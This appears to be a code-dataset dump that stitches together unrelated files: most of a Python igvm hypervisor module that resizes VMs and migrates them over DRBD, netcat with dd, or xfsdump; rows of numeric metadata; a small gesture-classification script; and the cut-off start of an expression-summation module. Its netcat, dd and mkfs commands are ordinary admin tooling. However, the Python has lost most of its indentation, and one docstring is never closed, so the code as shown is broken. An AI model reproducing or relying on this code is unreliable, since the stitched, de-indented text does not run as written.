self._check_attribute_synced(vm, 'num_cpu')
if num_cpu < 1:
raise ConfigError('Invalid num_cpu value: {}'.format(num_cpu))
log.info(
'Changing #CPUs of "{}" on "{}" from {} to {}...'
.format(vm.fqdn, self.fqdn, vm.dataset_obj['num_cpu'], num_cpu)
)
# If VM is offline, we can just rebuild the domain
if not self.vm_running(vm):
log.info('VM is offline, rebuilding domain with new settings')
vm.dataset_obj['num_cpu'] = num_cpu
self.redefine_vm(vm)
else:
set_vcpus(self, vm, self._get_domain(vm), num_cpu)
# Validate changes
# We can't rely on the hypervisor to provide data on VMs all the time.
updated_dataset_obj = self.vm_sync_from_hypervisor(vm)
current_num_cpu = updated_dataset_obj['num_cpu']
if current_num_cpu != num_cpu:
raise HypervisorError(
'New CPUs are not visible to hypervisor, changes will not be '
'committed.'
)
vm.dataset_obj['num_cpu'] = num_cpu
vm.dataset_obj.commit()
def vm_set_memory(self, vm, memory):
self._check_committed(vm)
vm.check_serveradmin_config()
self._check_attribute_synced(vm, 'memory')
running = self.vm_running(vm)
if running and memory < vm.dataset_obj['memory']:
raise InvalidStateError(
'Cannot shrink memory while VM is running'
)
if self.free_vm_memory() < memory - vm.dataset_obj['memory']:
raise HypervisorError('Not enough free memory on hypervisor.')
log.info(
'Changing memory of "{}" on "{}" from {} MiB to {} MiB'
.format(vm.fqdn, self.fqdn, vm.dataset_obj['memory'], memory)
)
vm.dataset_obj['memory'] = memory
vm.check_serveradmin_config()
# If VM is offline, we can just rebuild the domain
if not running:
log.info('VM is offline, rebuilding domain with new settings')
self.redefine_vm(vm)
vm.dataset_obj.commit()
else:
old_total = vm.meminfo()['MemTotal']
set_memory(self, vm, self._get_domain(vm))
vm.dataset_obj.commit()
# Hypervisor might take some time to propagate memory changes,
# wait until MemTotal changes.
            retry_wait_backoff(
                lambda: vm.meminfo()['MemTotal'] != old_total,
                "New memory is not visible to the virtual machine. Note "
                "that we cannot decrease the domain's memory online. The "
                "libvirt and serveradmin changes will therefore not be "
                "rolled back.",
                max_wait=40
            )
# Validate changes, if possible.
current_memory = self.vm_sync_from_hypervisor(vm).get('memory', memory)
if current_memory != memory:
            raise HypervisorError(
                "Warning: The sanity check to see if libvirt reports the "
                "updated amount of memory for the domain we just changed "
                "has failed. Note that we cannot decrease the domain's "
                "memory online. The libvirt and serveradmin changes will "
                "therefore not be rolled back."
            )
def vm_set_disk_size_gib(self, vm, new_size_gib):
"""Changes disk size of a VM."""
if new_size_gib < vm.dataset_obj['disk_size_gib']:
raise NotImplementedError(
'Cannot shrink the disk. '
'Use `igvm migrate --offline --offline-transport xfs '
'--disk-size {} {}`'.format(
new_size_gib, vm.fqdn,
)
)
volume = self.get_volume_by_vm(vm)
if self.get_storage_type() == 'logical':
            # There is no resize function in the version of libvirt
            # shipped with Debian 9.
self.run('lvresize {} -L {}g'.format(volume.path(), new_size_gib))
self.get_storage_pool().refresh()
else:
raise NotImplementedError(
'Storage volume resizing is supported only on LVM storage!'
)
self._get_domain(vm).blockResize(
'vda',
new_size_gib * 1024 ** 2, # Yes, it is in KiB
)
vm.run('xfs_growfs /')
def create_vm_storage(self, vm, transaction=None, vol_name=None):
"""Allocate storage for a VM. Returns the disk path."""
vol_name = vm.uid_name if vol_name is None else vol_name
volume_xml = """
<volume>
<name>{name}</name>
<allocation unit="G">{size}</allocation>
<capacity unit="G">{size}</capacity>
</volume>
""".format(
name=vol_name,
size=vm.dataset_obj['disk_size_gib'],
)
volume = self.get_storage_pool().createXML(volume_xml, 0)
if volume is None:
raise StorageError(
'Failed to create storage volume {}/{}'.format(
self.get_storage_pool().name(),
vol_name,
)
)
if transaction:
transaction.on_rollback('destroy storage', volume.delete)
# XXX: When building a VM we use the volumes path to format it right
# after creation. Unfortunately the kernel is slow to pick up on zfs
# volume changes and creates the symlink in /dev/zvol/<pool>/ only
# after a moment.
self.run("while [ ! -L '{}' ]; do sleep 1; done".format(volume.path()))
def format_vm_storage(self, vm, transaction=None):
"""Create new filesystem for VM and mount it. Returns mount path."""
if self.vm_defined(vm):
raise InvalidStateError(
'Refusing to format storage of defined VM "{}".'
.format(vm.fqdn)
)
mkfs_options = XFS_CONFIG.get(vm.dataset_obj['os'])
if not mkfs_options:
raise ConfigError(
'No mkfs options defined for OS {}'.format(
vm.dataset_obj['os']
)
)
self.format_storage(self.get_volume_by_vm(vm).path(), mkfs_options)
return self.mount_vm_storage(vm, transaction)
def download_and_extract_image(self, image, target_dir):
"""Download image, verify its checsum and extract it
All operations must be performed with locking, so that parallel
running igvm won't touch eachothers' images.
"""
self.run(
'( '
'set -e ; '
'flock -w 120 9 ; '
'curl -o {img_path}/{img_file}.md5 {md5_url} ; '
'sed -Ei \'s_ (.*/)?([a-zA-Z0-9\\.\\-]+)$_ {img_path}/\\2_\' '
'{img_path}/{img_file}.md5 ; '
'md5sum -c {img_path}/{img_file}.md5 || '
'curl -o {img_path}/{img_file} {img_url} ; '
'tar --xattrs --xattrs-include=\'*\' -xzf {img_path}/{img_file} '
'-C {dst_path} ;'
') 9>/tmp/igvm_image.lock'.format(
img_path=IMAGE_PATH,
img_file=image,
img_url=IGVM_IMAGE_URL.format(image=image),
md5_url=IGVM_IMAGE_MD5_URL.format(image=image),
dst_path=target_dir,
)
)
def mount_vm_storage(self, vm, transaction=None):
"""Mount VM filesystem on host and return mount point."""
if vm in self._mount_path:
return self._mount_path[vm]
if self.vm_defined(vm) and self.vm_running(vm):
raise InvalidStateError(
'Refusing to mount VM filesystem while VM is powered on'
)
self._mount_path[vm] = self.mount_temp(
self.get_volume_by_vm(vm).path(), suffix=('-' + vm.fqdn)
)
if transaction:
transaction.on_rollback(
'unmount storage', self.umount_vm_storage, vm
)
vm.mounted = True
return self._mount_path[vm]
def umount_vm_storage(self, vm):
"""Unmount VM filesystem."""
if vm not in self._mount_path:
return
self.umount_temp(self._mount_path[vm])
self.remove_temp(self._mount_path[vm])
del self._mount_path[vm]
vm.mounted = False
def vm_sync_from_hypervisor(self, vm):
"""Synchronizes serveradmin information from the actual data on
the hypervisor. Returns a dict with all collected values."""
# Update disk size
result = {}
try:
vol_size = self.get_volume_by_vm(vm).info()[1]
result['disk_size_gib'] = int(math.ceil(vol_size / 1024 ** 3))
except HypervisorError:
raise HypervisorError(
'Unable to find source LV and determine its size.'
)
self._vm_sync_from_hypervisor(vm, result)
return result
def conn(self):
conn = get_virtconn(self.fqdn)
if not conn:
raise HypervisorError(
'Unable to connect to hypervisor "{}"!'
.format(self.fqdn)
)
return conn
def num_numa_nodes(self):
"""Return the number of NUMA nodes"""
return self.conn().getInfo()[4]
def _find_domain(self, vm):
"""Search and return the domain on hypervisor
It is erroring out when multiple domains found, and returning None,
when none found.
"""
found = None
# We are not using lookupByName(), because it prints ugly messages to
# the console.
for domain in self.conn().listAllDomains():
name = domain.name()
# Match the domain based on the object_id encoded in its name
if not vm.match_uid_name(name):
continue
if found is not None:
raise HypervisorError(
'Same VM is defined multiple times as "{}" and "{}".'
.format(found.name(), name)
)
found = domain
return found
def _get_domain(self, vm):
domain = self._find_domain(vm)
if not domain:
raise HypervisorError(
'Unable to find domain "{}" on hypervisor "{}".'
.format(vm.fqdn, self.fqdn)
)
return domain
def vm_block_device_name(self):
"""Get the name of the root file system block device as seen by
the guest OS"""
return 'vda1'
def check_migrate_parameters(
self, vm: VM, offline: bool, offline_transport: str,
disk_size: int = None,
):
if offline_transport not in ['netcat', 'drbd', 'xfs']:
raise StorageError(
'Unknown offline transport method {}!'
.format(offline_transport)
)
if disk_size is None:
return
if disk_size < 1:
raise StorageError('disk_size must be at least 1GiB!')
if not (offline and offline_transport == 'xfs'):
raise StorageError(
'disk_size can be applied only with offline transport xfs!'
)
allocated_space = vm.dataset_obj['disk_size_gib'] - vm.disk_free()
if disk_size < allocated_space:
raise StorageError(
'disk_size is lower than allocated space: {} < {}!'
.format(disk_size, allocated_space)
)
def vm_new_disk_size(
self, vm: VM, offline: bool, offline_transport: str,
disk_size: int = None,
) -> int:
self.check_migrate_parameters(
vm, offline, offline_transport, disk_size
)
if disk_size is None:
return vm.dataset_obj['disk_size_gib']
return disk_size or vm.dataset_obj['disk_size_gib']
def _vm_apply_new_disk_size(
self, vm: VM, offline: bool, offline_transport: str,
transaction: Transaction, disk_size: int = 0,
):
"""
If the new VM disk size is set, checks that it is correct and
sufficient and commits the new size. Rolls it back if the migration
is interrupted.
:param VM vm: The migrating VM
:param str offline_transport: offline migration transport
:param Transaction transaction: The transaction to rollback
:param int disk_size: the new disk_size_gib attribute
"""
size = self.vm_new_disk_size(vm, offline,
offline_transport, disk_size)
if size == vm.dataset_obj['disk_size_gib']:
return
old_size = vm.dataset_obj['disk_size_gib']
vm.dataset_obj['disk_size_gib'] = size
vm.dataset_obj.commit()
if transaction:
def restore_size():
vm.dataset_obj['disk_size_gib'] = old_size
vm.dataset_obj.commit()
transaction.on_rollback('reset_disk_size', restore_size)
def _wait_for_shutdown(
self, vm: VM, no_shutdown: bool, transaction: Transaction,
):
"""
If no_shutdown=True, waits for a manual VM shutdown. Otherwise
shuts down the VM.
:param VM vm: The migrating VM
:param bool no_shutdown: whether the VM must be shut down manually
:param Transaction transaction: The transaction to rollback
"""
vm.set_state('maintenance', transaction=transaction)
if vm.is_running():
if no_shutdown:
log.info('Please shut down the VM manually now')
vm.wait_for_running(running=False, timeout=86400)
else:
vm.shutdown(
check_vm_up_on_transaction=False,
transaction=transaction,
)
def migrate_vm(
self, vm: VM, target_hypervisor: 'Hypervisor', offline: bool,
offline_transport: str, transaction: Transaction, no_shutdown: bool,
disk_size: int = 0,
):
self._vm_apply_new_disk_size(
vm, offline, offline_transport, transaction, disk_size
)
if offline:
log.info(
'Starting offline migration of vm {} from {} to {}'.format(
vm, vm.hypervisor, target_hypervisor)
)
target_hypervisor.create_vm_storage(vm, transaction)
if offline_transport == 'drbd':
is_lvm_storage = (
self.get_storage_type() == 'logical'
and target_hypervisor.get_storage_type() == 'logical'
)
if not is_lvm_storage:
raise NotImplementedError(
'DRBD migration is supported only between hypervisors '
'using LVM storage!'
)
host_drbd = DRBD(self, vm, master_role=True)
peer_drbd = DRBD(target_hypervisor, vm)
if vm.hypervisor.vm_running(vm):
vm_block_size = vm.get_block_size('/dev/vda')
src_block_size = vm.hypervisor.get_block_size(
vm.hypervisor.get_volume_by_vm(vm).path()
)
dst_block_size = target_hypervisor.get_block_size(
target_hypervisor.get_volume_by_vm(vm).path()
)
log.debug(
'Block sizes: VM {}, Source HV {}, Destination HV {}'
.format(vm_block_size, src_block_size, dst_block_size)
)
vm.set_block_size('vda', min(
vm_block_size,
src_block_size,
dst_block_size,
))
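# DRBD replicates at the block level, so the guest must not issue
# writes with a logical block size larger than either backing
# device supports; taking the minimum of all three keeps the
# replicated writes valid on both hypervisors.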
with host_drbd.start(peer_drbd), peer_drbd.start(host_drbd):
# XXX: Do we really need to wait for both?
host_drbd.wait_for_sync()
peer_drbd.wait_for_sync()
self._wait_for_shutdown(vm, no_shutdown, transaction)
elif offline_transport == 'netcat':
self._wait_for_shutdown(vm, no_shutdown, transaction)
vm_disk_path = target_hypervisor.get_volume_by_vm(vm).path()
with target_hypervisor.netcat_to_device(vm_disk_path) as args:
self.device_to_netcat(
self.get_volume_by_vm(vm).path(),
vm.dataset_obj['disk_size_gib'] * 1024 ** 3,
args,
)
elif offline_transport == 'xfs':
self._wait_for_shutdown(vm, no_shutdown, transaction)
with target_hypervisor.xfsrestore(vm, transaction) as listener:
self.xfsdump(vm, listener, transaction)
target_hypervisor.wait_for_xfsrestore(vm)
target_hypervisor.check_xfsrestore_log(vm)
target_hypervisor.umount_vm_storage(vm)
target_hypervisor.define_vm(vm, transaction)
else:
# For online migrations always use same volume name as VM
# already has.
target_hypervisor.create_vm_storage(
vm, transaction,
vm.hypervisor.get_volume_by_vm(vm).name(),
)
migrate_live(self, target_hypervisor, vm, self._get_domain(vm))
def total_vm_memory(self):
"""Get amount of memory in MiB available to hypervisor"""
# Start with what OS sees as total memory (not installed memory)
total_mib = self.conn().getMemoryStats(-1)['total'] // 1024
# Always keep some extra memory free for Hypervisor
total_mib -= HOST_RESERVED_MEMORY_MIB[self.get_storage_type()]
return total_mib
def free_vm_memory(self) -> int:
"""Get memory in MiB available (unallocated) on the hypervisor"""
total_mib = self.total_vm_memory()
# Calculate memory used by other VMs.
# We cannot trust conn().getFreeMemory(); sum up memory used by
# each VM instead
used_mib = 0
for dom in self.conn().listAllDomains():
# Since every VM has its own overhead in QEMU, we must account for
# it accordingly, and not once overall for the whole HV.
used_mib += dom.info()[2] // 1024 + VM_OVERHEAD_MEMORY_MIB
return total_mib - used_mib
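# Worked example (numbers illustrative): with total_vm_memory() of
# 257000 MiB and three domains using 32768 MiB each, free memory is
# 257000 - 3 * (32768 + VM_OVERHEAD_MEMORY_MIB) MiB.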
def start_vm(self, vm):
log.info('Starting "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).create() != 0:
raise HypervisorError('"{0}" failed to start'.format(vm.fqdn))
def vm_defined(self, vm):
return self._find_domain(vm) is not None
def vm_running(self, vm):
"""Check if the VM is kinda running using libvirt
Libvirt has a state called "RUNNING", but it is not we want in here.
The callers of this function expect us to cover all possible states
the VM is somewhat alive. So we return true for all states before
"SHUTOFF" state including "SHUTDOWN" which actually only means
"being shutdown". If we would return false for this state
then consecutive start() call would fail.
"""
return self._get_domain(vm).info()[0] < VIR_DOMAIN_SHUTOFF
def stop_vm(self, vm):
log.info('Shutting down "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).shutdown() != 0:
raise HypervisorError('Unable to stop "{}".'.format(vm.fqdn))
def stop_vm_force(self, vm):
log.info('Force-stopping "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).destroy() != 0:
raise HypervisorError(
'Unable to force-stop "{}".'.format(vm.fqdn)
)
def undefine_vm(self, vm, keep_storage=False):
if self.vm_running(vm):
raise InvalidStateError(
'Refusing to undefine running VM "{}"'.format(vm.fqdn)
)
log.info('Undefining "{}" on "{}"'.format(vm.fqdn, self.fqdn))
if not keep_storage:
# XXX: get_volume_by_vm depends on domain names to find legacy
# domains w/o an uid_name. The order is therefore important.
self.get_volume_by_vm(vm).delete()
if self._get_domain(vm).undefine() != 0:
raise HypervisorError('Unable to undefine "{}".'.format(vm.fqdn))
def redefine_vm(self, vm, new_fqdn=None):
# XXX: vm_lv_update_name depends on domain names to find legacy domains
# w/o an uid_name. The order is therefore important.
self.vm_lv_update_name(vm)
self.undefine_vm(vm, keep_storage=True)
# XXX: undefine_vm depends on vm.fqdn being the old name for finding
# legacy domains w/o an uid_name. The order is therefore important.
vm.fqdn = new_fqdn or vm.fqdn
self.define_vm(vm)
def _vm_sync_from_hypervisor(self, vm, result):
vm_info = self._get_domain(vm).info()
mem = int(vm_info[2] / 1024)
if mem > 0:
result['memory'] = mem
num_cpu = vm_info[3]
if num_cpu > 0:
result['num_cpu'] = num_cpu
def vm_info(self, vm):
"""Get runtime information about a VM"""
props = DomainProperties.from_running(self, vm, self._get_domain(vm))
return props.info()
def get_free_disk_size_gib(self, safe=True):
"""Return free disk space as float in GiB"""
pool_info = self.get_storage_pool().info()
# Floor instead of ceil because we check free instead of used space
vg_size_gib = math.floor(float(pool_info[3]) / 1024 ** 3)
if safe is True:
vg_size_gib -= RESERVED_DISK[self.get_storage_type()]
return vg_size_gib
def mount_temp(self, device, suffix=''):
"""Mounts given device into temporary path"""
mount_dir = self.run('mktemp -d --suffix {}'.format(suffix))
self.run('mount {0} {1}'.format(device, mount_dir))
return mount_dir
def umount_temp(self, device_or_path):
"""Unmounts a device or path
Sometimes it is impossible to immediately umount a directory because
a process is still holding it open. This often happens when igvm is
stopped: underlying processes such as puppetrun won't die immediately.
"""
retry = 10
for i in range(0, retry):
if i > 0:
log.warning(
'Umounting {} failed, attempting again in a moment. '
'{} attempts left.'
.format(device_or_path, retry - i)
)
sleep(1)
res = self.run(
'umount {0}'.format(device_or_path),
warn_only=(i < retry - 1),
)
if res.succeeded:
return
def remove_temp(self, mount_path):
self.run('rmdir {0}'.format(mount_path))
def format_storage(self, device, options):
self.run('mkfs.xfs -f {} {}'.format(' '.join(options), device))
def check_netcat(self, port):
pid = self.run(
'pgrep -f "^/bin/nc.openbsd -l -p {}"'
.format(port),
warn_only=True,
silent=True
)
if pid:
raise StorageError(
'Listening netcat already found on destination hypervisor.'
)
def kill_netcat(self, port):
self.run(
'pkill -f "^/bin/nc.openbsd -l -p {}"'.format(port),
warn_only=True, # It's fine if the process already dead
)
def _netcat_port(self, device: str) -> int:
"""
Gets the minor ID of the device, calculates the netcat listen port
for it, checks whether a netcat process already exists, and returns
the port
dev_minor = self.run('stat -L -c "%T" {}'.format(device), silent=True)
dev_minor = int(dev_minor, 16)
port = 7000 + dev_minor
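# Example: for a device node with minor number 0x2a (42), stat
# prints "2a" and the listen port becomes 7000 + 42 = 7042.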
self.check_netcat(port)
return port
@contextmanager
def netcat_to_device(self, device: str) -> Iterator[Tuple[str, int]]:
"""
Spawns a background netcat process on a unique port and pipes the
payload to a dd process to restore the file system on the target
hypervisor. Kills the netcat process if an exception is caught.
:param str device: The path to the volume device
:rtype Iterator[Tuple[str, int]]: (fqdn, port) pair
"""
port = self._netcat_port(device)
# Using dd with a big enough block size (obs=1048576, i.e. 1 MiB) lowers the load on the device
self.run(
'nohup /bin/nc.openbsd -l -p {0} | dd of={1} obs=1048576 &'
.format(port, device),
pty=False, # Has to be here for background processes
)
try:
yield self.fqdn, port
except BaseException:
self.kill_netcat(port)
raise
def device_to_netcat(
self, device: str, size: int, listener: Tuple[str, int]
):
"""
Dumps the device via dd and netcat to a remote listener
:param str device: The path to the volume device
:param int size: The disk size for pv progress and ETA
:listener Tuple[str, int] listener: (fqdn, port) pair for nc connection
"""
# Using dd with a big enough block size (ibs=1048576, i.e. 1 MiB) lowers the load on the device
self.run(
'dd if={0} ibs=1048576 | pv -f -s {1} '
'| /bin/nc.openbsd -q 1 {2} {3}'
.format(device, size, listener[0], listener[1])
)
def _xfsrestore_log_name(self, vm: VM) -> str:
device_name = self.get_volume_by_vm(vm).name()
return '/tmp/xfsrestore-{}.log'.format(device_name)
def check_xfsrestore_log(self, vm: VM):
"""
Search for WARNING in the xfsrestore log file.
Raises exception if found
"""
self.run('cat {}'.format(self._xfsrestore_log_name(vm)))
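# Invert grep's exit status: a match means xfsrestore produced
# warnings (or hit truncated data), which we treat as a failure.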
try:
self.run('grep -qE "WARNING|failed: end of recorded data" {} && '
'exit 1 || exit 0'
.format(self._xfsrestore_log_name(vm)))
except RemoteCommandError:
raise XfsMigrationError('xfs dump/restore caused warnings')
@contextmanager
def xfsrestore(
self, vm: VM, transaction: Transaction = None,
) -> Iterator[Tuple[str, int]]:
"""
Formats a VM's storage, mounts it, spawns a background netcat
process and pipes the stream to the xfsrestore command to restore
an xfsdump on the target HV
:param VM vm: The migrating VM
:param Transaction transaction: The transaction to rollback
:rtype Iterator[Tuple[str, int]]: (fqdn, port) pair
"""
device = self.get_volume_by_vm(vm).path()
port = self._netcat_port(device)
mount_dir = self.format_vm_storage(vm, transaction)
# xfsrestore args:
# -F: Don't prompt the operator.
# -J: inhibits inventory update
# xfsrestore needs to output its logs, otherwise it fails
self.run(
'nohup /bin/nc.openbsd -l -p {0} '
'| xfsrestore -F -J - {1} 2>{2} 1>&2 &'
.format(port, mount_dir, self._xfsrestore_log_name(vm)),
pty=False, # Has to be here for background processes
)
try:
yield self.fqdn, port
except BaseException:
self.kill_netcat(port)
raise
def wait_for_xfsrestore(self, vm: VM):
"""
On HVs with slow IO, the process must wait until xfsrestore is done
"""
mount_dir = self.vm_mount_path(vm)
self.run(
'while pgrep -f "^xfsrestore -F -J - {0}"; do sleep 1; done'
.format(mount_dir)
)
def xfsdump(self, vm: VM, listener, transaction: Transaction = None):
"""
Mounts the vm's storage, and then dumps the device via xfsdump and
netcat to a remote listener
:param VM vm: The migrating VM
:param Transaction transaction: The transaction to rollback
"""
mount_dir = self.mount_vm_storage(vm, transaction)
# xfsdump args:
# -l: level 0 is an absolute dump
# -F: Don't prompt the operator.
# -J: inhibits inventory update
# -p: progress update interval
self.run(
'xfsdump -o -l 0 -F -J -p 1 - {0} '
'| /bin/nc.openbsd -q 1 {1} {2}'
.format(mount_dir, listener[0], listener[1]),
)
self.umount_vm_storage(vm)
def estimate_cpu_cores_used(self, vm: VM) -> float:
"""Estimate the number of CPU cores used by the VM
Estimate the number of CPU cores used by the VM on the Hypervisor
based on the known data of the past 24 hours, using the quotient of
the VM performance value and the Hypervisor's cpu_perffactor.
:param: vm: VM object
:return: number of CPU cores used on Hypervisor
"""
vm_performance_value = vm.performance_value()
# Serveradmin cannot handle floats right now, so we store them
# multiplied by one thousand and divide them by 1000 here again.
hv_cpu_perffactor = self.dataset_obj['cpu_perffactor'] / 1000
cpu_cores_used = vm_performance_value / hv_cpu_perffactor
return float(cpu_cores_used)
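# Example (illustrative numbers): with performance_value() == 12.0
# and cpu_perffactor stored as 1500 (1.5 after dividing by 1000),
# the estimate is 12.0 / 1.5 == 8.0 cores.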
def estimate_vm_cpu_usage(self, vm: VM) -> float:
"""Estimate CPU usage of a VM on the Hypervisor
Estimate the CPU usage (as percent) on the Hypervisor.
:param: vm: VM object
:return: CPU usage on Hypervisor (as percent)
"""
vm_cpu_cores = self.estimate_cpu_cores_used(vm)
hv_num_cpu = self.dataset_obj['num_cpu']
cpu_usage = (vm_cpu_cores / hv_num_cpu) * 100
return float(cpu_usage)
def estimate_cpu_usage(self, vm: VM) -> float:
"""Estimate the Hypervisor CPU usage with given VM
Estimate the total CPU usage of the Hypervisor with the given VM on top
based on the data we have from the past 24 hours.
:param: vm: VM object
:return: Cpu utilisation in percent as float
"""
vm_cpu_usage = self.estimate_vm_cpu_usage(vm)
hv_cpu_usage = self.dataset_obj['cpu_util_pct']
# Take into account that cpu_util_pct may be outdated
#
# Take into account recent migrations from and to the Hypervisor to
# avoid moving too many VMs to the same Hypervisor or discarding the
# Hypervisor as candidate because the cpu_util_pct is not up-to-date
# yet.
#
# The migration_log records migrations of the past 24 hours; after
# that, cpu_util_pct should have up-to-date values.
cpu_usage = sum([
hv_cpu_usage,
vm_cpu_usage,
self.cpu_usage_of_recent_migrations(),
])
# TODO: The sum of estimated CPU usage can be negative because
# cpu_usage_of_recent_migrations() can be negative.
# Make this more stable and account for this discrepancy.
# I.e. some if not all of the inputs are wrong!
if cpu_usage < 0:
log.error(
'Estimated CPU usage for Hypervisor "{}" and VM "{}" is '
'negative! Beware that this can lead to wrong '
'assumptions! Setting to zero!'.format(
str(self),
str(vm),
)
)
cpu_usage = max(0, cpu_usage)
return float(cpu_usage)
def cpu_usage_of_recent_migrations(self) -> int:
"""Summarized CPU usage of recent VM migrations
Summarize the CPU usage of VMs recently migrated from or to this
Hypervisor and return the total.
:return: Total CPU usage of recently moved VMs
"""
migration_log = self.dataset_obj['igvm_migration_log']
total_cpu_usage = 0
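# Each log entry has the form "<timestamp> <signed usage>", e.g.
# "1632148000 +12" or "1632148000 -12" (written by log_migration
# below), so summing the second fields yields the net CPU delta.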
for vm_migration_log in migration_log:
cpu_usage = vm_migration_log.split(' ')[1]
total_cpu_usage = total_cpu_usage + int(cpu_usage)
return total_cpu_usage
def log_migration(self, vm: VM, operator: str) -> None:
"""Log migration to or from Hypervisor
Save the estimated CPU usage of the VM to the migration log to be able
to take recent migrations into account when this Hypervisor is selected
as possible candidate.
:param vm: VM object
:param operator: plus for migration to HV, minus for migration from HV
"""
cpu_usage_vm = self.estimate_vm_cpu_usage(vm)
timestamp = int(time())
log_entry = '{} {}{}'.format(timestamp, operator, round(cpu_usage_vm))
self.dataset_obj['igvm_migration_log'].add(log_entry)
self.dataset_obj.commit()
| 37.069686 | 79 | 0.580388 | 5,243 | 42,556 | 4.525653 | 0.141713 | 0.015425 | 0.016689 | 0.008766 | 0.275076 | 0.204442 | 0.15547 | 0.108142 | 0.080496 | 0.067557 | 0 | 0.006446 | 0.32919 | 42,556 | 1,147 | 80 | 37.102005 | 0.824745 | 0.217126 | 0 | 0.18 | 0 | 0.001333 | 0.146053 | 0.006681 | 0 | 0 | 0 | 0.000872 | 0 | 1 | 0.084 | false | 0 | 0.021333 | 0.001333 | 0.158667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ff6af002204700fbd6b844b12cc508cbdc90c4 | 1,092 | py | Python | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | ["MIT"] | null | null | null | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | ["MIT"] | null | null | null | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | ["MIT"] | null | null | null | import re
import numpy as np
import pandas as pd
import Deployment
def delete_prefix(data):
for i in range(len(data)):
data[i] = data[i][2:]
return data
if __name__ == '__main__':
data_path = './test_data/'
for index in range(6):
raw_data = pd.read_table(filepath_or_buffer=data_path + 'txt/'+ str(index) + '.txt')
raw_data = np.array(raw_data).reshape(-1)
line = ''.join(raw_data)
expression = [r'(?:GX|GX-)\d+\.?\d*', r'(?:GY|GY-)\d+\.?\d*', r'(?:GZ|GZ-)\d+\.?\d*']
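# e.g. r'(?:GX|GX-)\d+\.?\d*' matches both 'GX1.5' and 'GX-2.0';
# delete_prefix() then strips the two-character 'GX' prefix,
# keeping any leading minus sign ('-2.0' stays negative).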
data = []
for i in range(len(expression)):
channel = delete_prefix(re.compile(expression[i]).findall(line))
channel = np.array(channel).astype(float)
data.append(channel)
data = np.array(data).astype(float)
for i in range(int(len(data[0])/20)):
label = Deployment.predict(data[:, i*20:(i+1)*20].transpose())
print(data[:, i*20:(i+1)*20].transpose())
# if label != 4:
print(str(index) + ' label:' + str(label))
pass | 33.090909 | 93 | 0.535714 | 148 | 1,092 | 3.817568 | 0.398649 | 0.049558 | 0.031858 | 0.058407 | 0.134513 | 0.134513 | 0.070796 | 0 | 0 | 0 | 0 | 0.021574 | 0.278388 | 1,092 | 33 | 94 | 33.090909 | 0.695431 | 0.012821 | 0 | 0 | 0 | 0 | 0.088038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.038462 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ffc0645f312017bac40fdac72356eef15c8019 | 15,756 | py | Python | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | ["MIT"] | 31 | 2021-09-09T16:09:55.000Z | 2022-02-20T02:15:19.000Z | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | ["MIT"] | 40 | 2021-08-06T14:30:08.000Z | 2022-01-19T08:49:52.000Z | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | ["MIT"] | 5 | 2021-08-06T11:20:31.000Z | 2022-01-07T19:39:40.000Z | from typing import Dict, Iterable, List, Mapping, NamedTuple, Optional, Sequence, Tuple
from functools import reduce
import collections
import itertools
import numpy as np
import operator
import random
from rlo.expression import Expression
from rlo.expression_util import SymtabAndDefs, ExprWithEnv
from rlo import rewrites
from rlo import utils
from ksc.type import Type
def _inplace_add_term_dicts(dict1, dict2):
for var, coeff in dict2.items():
dict1.setdefault(var, 0)
dict1[var] += coeff
def _collect_terms_into_dict(expr: Expression):
if expr.op == "variable":
return {expr.name: 1}
elif expr.op == "constant":
return {"": int(expr.value)}
elif expr.op == "add":
lhs = _collect_terms_into_dict(expr.children[0])
_inplace_add_term_dicts(lhs, _collect_terms_into_dict(expr.children[1]))
return lhs
elif expr.op == "sub":
lhs = _collect_terms_into_dict(expr.children[0])
_inplace_add_term_dicts(
lhs,
{
var: -coeff
for var, coeff in _collect_terms_into_dict(expr.children[1]).items()
},
)
return lhs
else:
raise ValueError(
"Cannot collect terms for expression containing operation {}".format(
expr.op
)
)
def _sum_of_expressions(exprs):
return reduce(operator.add, exprs)
def _make_variable(name):
return Expression.Variable(name, type=Type.Integer)
def _sum_of_variables(variable_names):
return _sum_of_expressions(_make_variable(v) for v in variable_names)
_symtab_and_defs = SymtabAndDefs()
def optimize_by_collecting_terms(expr: Expression) -> ExprWithEnv:
""" Optimize an expression of the form term0 + term1 + term2 + ... + termN,
where each term is either a constant or a variable.
The procedure is to collect up terms in the same variable, then
collect up variables which have the same resulting coefficient.
This is guaranteed to return the optimal rewrite for many classes
of input expressions, for example if each variable appears exactly
once with coefficient 1. More generally, if there is no coefficient
greater than 1 that appears exactly once, then this function will
return the best possible equivalent expression.
In the general case the optimal rewrite will depend on the rule set.
For example this function may return
4 + x1 + x2 + 2 * (x3 + x4 + x5 + x6) + 3 * x7
But an equivalent expression with lower cost is
4 + x1 + x2 + x7 + 2 * (x3 + x4 + x5 + x6 + x7)
However this may not be reachable for some rule sets. """
subexpressions = []
variables_by_coefficient: Dict = collections.defaultdict(
lambda: ([], [])
